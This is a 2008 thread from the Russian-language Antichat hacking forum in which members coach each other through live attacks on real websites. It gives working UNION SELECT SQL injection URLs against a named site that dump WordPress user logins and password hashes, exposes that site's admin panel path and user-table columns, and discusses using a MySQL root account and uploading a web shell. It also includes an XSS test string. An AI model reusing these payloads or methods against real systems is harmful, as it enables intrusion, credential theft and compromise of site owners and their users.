HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.11.2008, 21:01
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

@beerhack
Цитата:
что можно сделать с рутом от мускуля?
подключиться к мускулу, разумеется если сервер разрешает удаленные подключения (по умолчанию порт 3306). Или же воспользоваться phpmyadmin, если он установлен на удаленном сервере и ты знаешь путь до него
Цитата:
что можно найти интересного в дирах?
скрипт-аплоадер
Цитата:
- и какже всетаки залить шелл?
им же
 
Ответить с цитированием

  #2  
Старый 05.11.2008, 21:02
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

Вот админка
http://www.sngboard.ru/Admin/
(надо с большой буквы).


2 hulk
Вот все колонки в этой таблице

email
id
firstname
lastname
password
phone
 
Ответить с цитированием

  #3  
Старый 05.11.2008, 21:04
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

@diznt
Цитата:
Ошибку выводит

You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7--'' at line 1

Число столбцов определил "order by"
Что делать не представляю
/* пробовал? Если использовать --, то нужно так:
/index.php?pid=-1'+union+select+1,2,3,4,5,6,7--%20-
также пробуй #
/index.php?pid=-1'+union+select+1,2,3,4,5,6,7%23
 
Ответить с цитированием

  #4  
Старый 05.11.2008, 21:15
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

Если он определил кол-во столбцов через --, то и в конструкции union+select юзается так же -- . Возможно двойной запрос? Хотя ошибка синтаксическая.
Попробуй подзапросы
+and+substring(version(),1,1)=5--
(4,3)
 
Ответить с цитированием

  #5  
Старый 05.11.2008, 21:17
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

@beerhack
чтение дир возможно благодаря FreeBSD, юзай вот этот скрипт
http://www.blacktoad.info/releases/dir_parsing.txt
@jokester
Цитата:
И нужно писать их маленькими буквами
в MySQL регистр таблиц и колонок не имеет значения
 
Ответить с цитированием

  #6  
Старый 05.11.2008, 21:26
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от [Raz0r]  
@jokester

в MySQL регистр таблиц и колонок не имеет значения
Ты вместо того, что-бы написать это посмотрел-бы линк.

Я не говорил про mysql, я говорил про этот пример
Вот линки :

http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user _login,user_pass),8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27+from+wordpress.WP_USERS/*
Table 'wordpress.WP_USERS' doesn't exist

http://www.sngboard.ru/index.php?id_categ=-99999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user _login,user_pass),8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27+from+wordpress.wp_users/*
вывод
 
Ответить с цитированием

  #7  
Старый 05.11.2008, 21:20
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

Цитата:
Если он определил кол-во столбцов через --, то и в конструкции union+select юзается так же -- .
если использовать --, то для MySQL необходимо указывать -- с пробелом:
--%20
 
Ответить с цитированием

  #8  
Старый 05.11.2008, 21:31
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами: 10198073

Репутация: 354
По умолчанию

Цитата:
Сообщение от [Raz0r]  
если использовать --, то для MySQL необходимо указывать -- с пробелом:
--%20
Почему это "необходимо"? Вообще ни разу не юзал --%20, у меня работает и "--" на ура.
 
Ответить с цитированием

  #9  
Старый 05.11.2008, 21:51
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

http://dev.mysql.com/doc/refman/5.0/en/comments.html
http://dev.mysql.com/doc/refman/5.0/en/ansi-diff-comments.html

Последний раз редактировалось [Raz0r]; 05.11.2008 в 21:54..
 
Ответить с цитированием

  #10  
Старый 07.11.2008, 01:45
NetSter
студент
Регистрация: 30.07.2007
Сообщений: 800
С нами: 9885926

Репутация: 1188


По умолчанию

при добавлении коммента "><script>alert()</script> к фотке не одном из сайтов имеем сообщение:
Fatal error: Cannot redeclare class_mysql::$sql_login in /usr/local/www/worlds.ru/req/mysql.class on line 7
что это может быть?
ps/ сильно не пинать я только начинаю)
-------------EDIT---------------------
комменты и так не работают...
спс desTiny )
-------------EDIT---------------------

Последний раз редактировалось NetSter; 07.11.2008 в 14:53.. Причина: спс desTiny
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.